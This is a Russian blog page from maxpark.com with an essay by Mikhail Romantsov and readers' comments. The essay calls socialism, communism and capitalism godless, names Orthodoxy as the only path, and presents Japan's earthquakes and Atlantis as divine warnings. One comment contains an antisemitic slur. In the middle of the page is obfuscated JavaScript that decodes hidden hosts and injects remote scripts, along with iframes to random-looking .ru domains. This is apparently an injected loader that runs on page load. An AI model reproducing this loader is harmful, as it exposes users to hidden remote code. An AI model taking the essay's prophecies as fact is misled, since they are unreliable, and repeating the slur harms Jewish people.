СЕГОДНЯШНЕЕ СОЗНАНИЕ ЧЕЛОВЕЧЕСТВА

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Михаил Романцов написал
    4 оценок, 613 просмотров Обсудить (13)

     

     

     

    Социализм, Коммунизм, Капитализм  и Анархизм -  это предельные этапы новой современной истории, последние соблазны рода людей. И все острее чувствуют сегодня люди, что безбожный гуманизм- бесчеловечен.Социализм верит, что старый мир разрушится, что над старым злом будет произнесен окончательный приговор и суд и настанет совершенное состояние на Земле, Царство людской правды и люди будут как Боги. Мировая революция, социальная катастрофа, наступление социалистического Рая - все это вывернутая наизнанку религиозная идея конца истории. Социализм и Коммунизм хотели построить Рай на Земле, без Бога, без Его участия, простым разрушением старого и построением нового. Накормив род людей досыта, люди считали можно  так построить Рай. Решив материальную сторону жизни людей, они считали, что можно род людей привести к счастью. Но таким путем, можно придти только к животной радости, а не к человеческому счастью, что не одно и то же.

    Не понимая роли Бога РАЗУМА в истории создания и развития мира и общества людей, Эволюции, род людей пытался построить Рай. Чем это закончилось, известно сегодня всему миру. Развитие человека и мира, не есть отрицание прошлого, а есть утверждение того, что в нем заложено, раскрытие Бытия. В творческом развитии открывается небывалое. Процесс развития мира и человека, есть процесс трудовой. Развитие мира и человека с трудом дается, больших усилий стоит и не достигается мечтательной экзальтацией. Процесс развития мира и человека и всего рода людей медленный, временами неизбежно мучительный и полон страданий, для общества с кровью, войнами и смертью. Род людей должен свободно, до конца пройти процесс своего развития, Эволюцию или Путь к Богу. От Природного или животного, к БОГОЧЕЛОВЕЧЕСТВУ - это путь рода людей и хотят этого люди или нет, изменит ничего нельзя, такова воля Бога.

    Процесс истории привел род людей прошлого века к идее ПРОГРЕССА, которая стала вдохновляющей, стала НОВОЙ РЕЛИГИЕЙ, вместо старой, новым Богом. Род людей перестал верить Богу и сильнее еще стал верить в ПРОГРЕСС ЛЮДСКОЙ, в свое великое БУДУЩЕЕ. СВОЕ- вот слово содержащее в себе страшную иронию.Так как не один из живших и живущих людей, не может реально назвать это будущее своим. Не один из рода людей, не войдет в это будущее живым, а войдут его истлевшие кости. Все верующие в ПРОГРЕСС ждут,  что он приведет к хорошему, благому концу, что восторжествует Царство счастливого, радостного, свободного, здорового и сильного и божественного Рая, для всего Общества. Вдохновляется этим грядущим, не известно когда земным совершенством. Все люди верующие в ПРОГРЕСС понимают, что этот прогресс бесконечный, не имеет никакого конца во времени, а всякое грядущее совершенство считают подлежащим смене состоянием, еще более совершенным, еще более далеким.

    Сегодня род людей переживает тяжелый кризис всего и вся, зашел в полный тупик, из которого не видит никакого выхода. Все противоречия обострились сегодня  до последнего предела и общество находится в ежедневном ожидании мировой КАТАСТРОФЫ, причиной которой станет КАТАСТРОФА  двух религий, мусульманской и христианской, которая сегодня держится только на волоске. Род людей сегодня разочарован Социализмом и Анархизмом, Коммунизмом и Капитализмом, Демократией и Декаденством, Мистикой и Наукой, всеми Религиями и пустой Новейшей Философией, а также во всех институтах ВЛАСТИ. Общество испытывает сегодня небывалое еще ощущение Личности и Сознания неизбежности НОВОГО ОБЩЕСТВА, какой то предел всего и таинственном его разрешении. Сегодня наступило время такой невыносимой  тоски ДУХА, от того, что все и вся и весь мир и род людей духовно мертв или слеп. Такого томления по ДУХОВНОСТИ , РАЗУМУ и духовному разрешению всех противоречий , еще не было в истории развития мира и рода людей. Так что неизбежно что то должно произойти и начаться.

    Из всех религий мира одна и единственная ПРАВОСЛАВИЕ ОСОЗНАЕТ космическое значение рода людей. Сегодня мировое общество не смотря на кризис всего и вся, добивается такой жизни, в которой нет места всему плохому, грешному и всему, что от Сатаны. Отчего род людей взял эти идеалы? Ничем это не обьяснить, кроме одного: наступило время социальных, глобальных преобразований в истории развития мирового общества людей и каждый народ делает для себя Вселенский ВЫБОР БУДУЩЕГО. Это не что иное, как пробуждение СОЗНАНИЯ, к тем идеалам ВЕЧНОГО БЫТИЯ, которые указал Бог. Значит пришло время приобретения родом людей своего ВСЕЛЕНСКОГО ДОСТОИНСТВА. Сегодня время требует от каждого из людей, немедленного ОСОЗНАНИЯ своего места в Эволюции, что бы успеть войти в НОВОЕ БУДУЩЕЕ, минуя смерть и ужасы АПОКАЛИПСИСА. или ТРЕТЬЕЙ МИРОВОЙ АТОМНОЙ ВОЙНЫ или МИРОВОГО ПОТОПА крови людской. Кто этого не сделает будет ПОТОПЛЕН. Для этой цели человеческому обществу представлены все гарантии и открыт путь к СПАСЕНИЮ, подготовлена среда развития, оставлено духовное наследие и расставлены все ориентиры в будущее и УКАЗАН ПУТЬ и ТЕОРЕТИЧЕСКИ и ПРАКТИЧЕСКИ.

    Сегодня капитализм, безумие или Сатана, переоделся в одежды Бога и подменил роду людей все абсолютно ценности. и переставил и поменял указатели на этом пути, что бы сбить с толку и истинного пути детей Бога всех нас. Вместо истинного, Бога  Разума подменил людям на ложного, Деньги( Безумие, сатану, мамону), которым род людей сегодня и все народы, всех религий поклоняются больше, чем всем богам вместе взятым, с утра до вечера и с вечера до утра, на всех базарах мира. Род людей сегодня находится в полном тупике своего развития. Мир материальный освоен довольно хорошо , хотя миллион вопросов так и осталось без ответа. 14 лет живем в 21 веке СВЯТОГО ДУХА, как и само число 21.Духовный мир, род людей не понимает, как того должно быть. Вся Святая Троица уже на Земле, все три ее ЛИЦА или ЛИЧНОСТИ. 

    Она указала Путь к Богу или дорогу, по которой должен идти род людей. Сегодня в полном тупике находятся Наука и Религия, Культура и Образование, Воспитание вообще отсутствует и Медицина, Власть и Отношения, между народами, нациями, родственниками, в семье, ближнего  с ближним и соседями. Все на словах процветает, а люди лучше, добрее , разумнее, здоровее, радостнее и счастливее, не становятся. Сегодня Род людей надеется построить РАЙ на Земле, с помощью нана или новых технологий , с помощью ТЕХНИЧЕСКОГО ПРОГРЕССА, с помощью машин. Человек снова выдумывает, снова свои пути в Рай,не анализирую истории и не делает никаких выводов, не слушая Бога Разума и его слов и истин вместо того, чтобы учиться у Бога РАЗУМА , учит Его.

     

    Но построить Рай на Земле, с помощью машин и техники которая, как думает человек, все сделает за него и сделает его счастливым, нельзя. Эта дорога технического прогресса как и все предыдущие, не имеют будущего и обречена на гибель, как это произошло с технически развитой и идущей этой же дорогой цивилизации АТЛАНТИДЫ.  Роду людей, по сей день, не понятно то, почему каждый год трясет все больше и больше самую технически развитую в мире Японию. На примере 130 миллионной Японии, Бог указывает слепому роду людей и всему миру, о не верном и гибельном их пути и в дальнейшем, при непослушании Бога, Япония последует вслед за Атлантидой и Будда не поможет им спастись. Поэтому не стоит гневить Бога,  так как он в скором будущем, ярко даст урок людям, что есть ценности в мире те, которые по своему неразумению создал человек за время своего развития по сей день, от каменно топора до сегодняшних достижений и покажет их ненужность и вред, в отличие от того, что так чудесно и разумно создал БОГ РАЗУМ.

    Все что надо человеку, Бог сотворил и ничего лишнего и нет никакой надобности, что то переделывать, доделывать или открывать. Это скоро люди поймут и займутся только тем единственным делом, которое поручил им Бог, совершенствовать свою плоть и дух с тем, что бы придти к Богу и стать ему подобным и по образу и по подобия, как он того и желает. Капитализм сегодняшний приведет человечество завтра к пропасти и войне и гибели  двух третей мира людей  и будет уроком  обучения уму людскому и разуму Божьему высшему разуму вселенной.

    <script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.​loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.​replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==​typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"​function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a251​9043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

    <iframe id="a1996667054" style="" src="https://25haich4342.ru/f2.html?a=26363" width="320" height="240"></iframe><iframe id="a754394637" style="" src="https://gyh1lh20owj.ru/u.html?a=26363" width="320" height="240"></iframe>

    Комментировать

    осталось 1185 символов
    пользователи оставили 13 комментариев , вы можете свернуть их
    Александр Мазин # написал комментарий 30 мая 2016, 11:54
    +++Мировая революция, социальная катастрофа, наступление социалистического Рая - все это вывернутая наизнанку религиозная идея конца истории. Социализм и Коммунизм хотели построить Рай на Земле, без Бога, без Его участия, простым разрушением старого и построением нового.+++
    Откуда вы эту чушь взяли? Ленин преследовал не Бога, а РПЦ. И причина у него была веская: РПЦ предала Россию. А Сталин вообще взялся реанимировать РПЦ, заручившись ее обещанием не выступать против народов СССР.
    Что касается социализма. Не планировалось механизмами социализма построить рай на земле. На это социализм не способен, ибо он является одним из вариантов рабовладельческого общества.
    А вот механизмами коммунизма рай на земле будет построен. Причем, опираясь на ВСЕ рекомендации Бога, ибо без них справедливость на Земле невозможна.
    Михаил Романцов # ответил на комментарий Александр Мазин 30 мая 2016, 20:30
    Рай на земле может быть построен только при разуме Божьем и никак без него никто не социализм не коммунизм не капитализм не в состоянии это сделать. Так что чушь не у меня а скорее у вас. Благодарю за мнение и свой взгляд на эту проблему.
    Юрий Арсентьев # написал комментарий 30 мая 2016, 19:46

    "Социализм верит, что старый мир разрушится, что над старым злом будет произнесен окончательный приговор и суд и настанет совершенное состояние на Земле, Царство людской правды и люди будут как Боги. Мировая революция, социальная катастрофа, наступление социалистического Рая - все это вывернутая наизнанку религиозная идея конца истории. Социализм и Коммунизм хотели построить Рай на Земле, без Бога, без Его участия, простым разрушением старого и построением нового. Накормив род людей досыта, люди считали можно так построить Рай. Решив материальную сторону жизни людей, они считали, что можно род людей привести к счастью. Но таким путем, можно придти только к животной радости, а не к человеческому счастью, что не одно и то же." - Автор любитель передергивать, что и выдает в нем Опытного ДЕМАГОГА! Ибо Социализм НЕ Верит - Социализм ЗНАЕТ! И Коммунизм НЕ рай на Земле а всего лишь БОЛЕЕ СПРАВЕДЛИВОЕ ОБЩЕСТВО!!!
    ссылка на maxpark.com с продолжением ссылка на maxpark.com
    Но понятно, что Автору ИСТИНА НЕ НУЖНА!!! Автору нужна паства Баранов! Причем СРОЧНО!!!!

    Михаил Романцов # ответил на комментарий Юрий Арсентьев 30 мая 2016, 20:33
    Юра не вижу разума высшего в ваших словах Без разума Бога высшего разума вселенной и его духа и духовности мы все есть и будем полными баранами еще долго.
    Юрий Арсентьев # ответил на комментарий Михаил Романцов 31 мая 2016, 05:22
    «Коммунизм просто непостижим для нашего святого потому, что коммунисты не выдвигают ни эгоизма против самоотверженности, ни самоотверженности против эгоизма и не воспринимают теоретически эту противоположность ни в её сентиментальной, ни в её выспренней идеологической форме; они, наоборот, раскрывают её материальные корни, с исчезновением которых она исчезает сама собой. Коммунисты вообще не проповедуют никакой морали, — каковой проповедью Штирнер занимается сверх всякой меры. Они не предъявляют людям морального требования: любите друг друга, не будьте эгоистами и т. д.; они, наоборот, отлично знают, что как эгоизм, так и самоотверженность есть при определённых обстоятельствах необходимая форма самоутверждения индивидов. Следовательно, коммунисты отнюдь не хотят, как думает святой Макс и как повторяет за ним его верный Dottore Graziano (Арнольд Руге, — за что святой Макс называет его «необычайно хитроумной и политической головой», Виганд, стр. 192), уничтожить «частного человека» в угоду «всеобщему», жертвующему собой человеку: это — чистейшая фантазия, насчёт которой оба они могли получить необходимые пояснения ещё в «Deutsch-Franzosische Jahrbucher».
    Юрий Арсентьев # ответил на комментарий Михаил Романцов 31 мая 2016, 05:24
    ... Коммунисты-теоретики, те немногие, у которых есть время заниматься историей, отличаются как раз тем, что только они открыли тот факт, что всюду в истории «общий интерес» созидается индивидами, которые определены в качество «частных людей». Они знают, что эта противоположность является лишь кажущейся, потому что одна из её сторон, так называемое «всеобщее», постоянно порождается другой стороной, частным интересом, а отнюдь не противостоит последнему как самостоятельная сила, имеющая самостоятельную историю, — так что эта противоположность практически всё снова уничтожается и вновь порождается. Мы имеем здесь, следовательно, не гегелевское «отрицательное единство» двух сторон противоположности, а материально обусловленное уничтожение прежнего, материально обусловленного, способа существования индивидов, с исчезновением которого исчезает и эта противоположность с её единством.»
    К. МАРКС И Ф. ЭНГЕЛЬС. — НЕМЕЦКАЯ ИДЕОЛОГИЯ.

    Но да.... Виноват.. Забыл, что Маркса Вы не только не читаете, но и на дух не переносите....
    Михаил Романцов # ответил на комментарий Юрий Арсентьев 31 мая 2016, 08:19
    +++ Вы абсолютно правы. Бог их лишил и разума и слова учить людей. Они сатанисты безумцы.и богоразумоборцы.
    Юрий Арсентьев # ответил на комментарий Михаил Романцов 31 мая 2016, 20:20

    То то и странно.... сатанисты безумцы и богоразумоборцы постоянно говорят Правду и борются за Истину! даже ОБЪЯСНЯЮТ - ЧТО же такое Истина!

    А вот те, кто их так называет и НЕ знает да знать не желает - что такое Истина, да и врут напропалую безбожно.... и даже от имени бога...
    Парадокс однако....

    Анатолий Пинигин # написал комментарий 30 мая 2016, 21:12
    Всё идёт, как должно быть - совки страдали по капитализму - они получили его, под совками я не имею ввиду советских людей, победивших фашизм и не допустивших атомную войну, а эту советскую гнилую мелочь, в основном еврейскую, мечтавшую о капитализме. Но вот какое дело - Россия, по необходимости преждевременно миновав стадию капитализма, на энтузиазме, как бы как барон Мюнхгаузен, выдернувший себя за волосы из болота, поднялась над собой и сделала невероятное - спасла мир от фашизма и от атомной войны. Но эволюцию не обманешь - Россия должна пройти и путь капитализма для полноценного развития, хотя бы для того, чтобы понять, что это за мерзость, что и имеем. Но это не значит, что светлые силы России могут спустить рукава и пассивно ждать. Спасибо тебе за твои статьи.
    Михаил Романцов # ответил на комментарий Анатолий Пинигин 30 мая 2016, 21:15
    Вы абсолютно правы. Благодарю.+++++
    Евгений Обухов-Петрик # ответил на комментарий Михаил Романцов 16 июня 2016, 01:07

    Да, Михаил, вы правы в том, что только религия, исповедующая не только Бога, но РОД и РОДину и общие понятия не унижающая субъективизмом личности, а именно Православие, но без гнусной иерархии продажных сатанинской власти попов, способна вывести Божий мир из нынешнего тупика. Наконец-то вы со мной согласились. ссылка на fabulae.ru - Русская Национальная Идея - Благо Рода!

    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 837 записей в блогах и 6695 комментариев.
    Зарегистрировалось 23 новых макспаркеров. Теперь нас 5025981.